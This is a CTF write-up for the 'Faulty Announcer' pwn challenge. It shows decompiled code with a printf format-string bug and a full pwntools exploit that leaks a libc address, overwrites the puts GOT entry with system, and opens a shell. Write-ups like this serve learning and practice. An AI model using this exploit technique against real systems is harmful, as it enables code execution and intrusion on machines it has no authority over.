2025-4

Challenge information

CTF:
Challenge: Faulty Announcer
Solves: 82
Description: ~ The speaker has its own ideas.
Time-wasting to solve: 10 min

Writeup

obviously fsb...

0040121b    int32_t main(int32_t argc, char** argv, char** envp)

0040122a        void* fsbase
0040122a        int64_t rax = *(fsbase + 0x28)
00401239        init()
00401248        puts(str: "What is your name?")
0040126b        char var_a2
0040126b        
0040126b        if (fgets(buf: &var_a2, n: 0xa, fp: stdin) != 0)
00401281            puts(str: "Speak loud what do you want")
004012a4            char var_98[0x88]
004012a4            
004012a4            if (fgets(buf: &var_98, n: 0x80, fp: stdin) != 0)
004012bf                printf(format: &var_98)
004012ce                puts(str: "I SAID SPEAK LOUD!")
004012ce                
004012f1                if (fgets(buf: &var_98, n: 0x80, fp: stdin) != 0)
00401309                    printf(format: &var_98)
00401318                    puts(str: "so you said")
00401327                    puts(str: &var_a2)
00401327        
00401335        *(fsbase + 0x28)
00401335        
0040133e        if (rax == *(fsbase + 0x28))
00401346            return 0
00401346        
00401340        __stack_chk_fail()
00401340        noreturn

leak libc address
got overwrite

from pwn import *
from icecream import ic
import sys

e = ELF("chall_patched",checksec=False)
libc = ELF("libc.so.6",checksec=False)
ld = ELF("ld-linux-x86-64.so.2",checksec=False)

nc = "nc 127.0.0.1 9999"
if "nc" in nc:
    HOST = nc.split(" ")[1]
    PORT = int(nc.split(" ")[2])
if "http" in nc:
    from urllib.parse import urlparse
    HOST = urlparse(nc).hostname
    PORT = urlparse(nc).port

dbg = 1
g_script = """
    #set max-visualize-chunk-size 0x300
    b *0x00401346
    c
"""

context.binary = e
if len(sys.argv) > 1:
    io = remote(host=HOST,port=PORT)
else:
    io = e.process()
    if dbg:
        gdb.attach(io,g_script)

s   = lambda b: io.send(b)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda b: io.sendline(b)
sln  = lambda b: io.sendline(str(b).encode())
sla = lambda a,b: io.sendlineafter(a,b)
r   = lambda : io.recv()
ru  = lambda b:io.recvuntil(b)
rl  = lambda : io.recvline()
pu32= lambda b : u32(b.ljust(4,b"\0"))
pu64= lambda b : u64(b.ljust(8,b"\0"))
hlog= lambda i : print(f"[*]{hex(i)}")
fsp = lambda b : f"%{b}$p".encode()
shell = lambda : io.interactive()

payload = b""
def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***")
def pay(*args, **kwargs): global payload; payload += b"".join([a if type(a) == bytes else (a.encode() if type(a) == str else p64(a)) for a in args])

sl(b"/bin/sh")

r()

sl(b"%p")

rl()
leak = int(rl().strip(),16)

libc.address = leak - (0x778a67203963 - 0x0000778a67000000)

ic(hex(libc.address))

pay(
    fmtstr_payload(8,{ e.got["puts"]: libc.symbols["system"], })
)

ic(len(payload))
ic(payload)

sl(payload)

r()

shell()

Last modified: 04 November 2025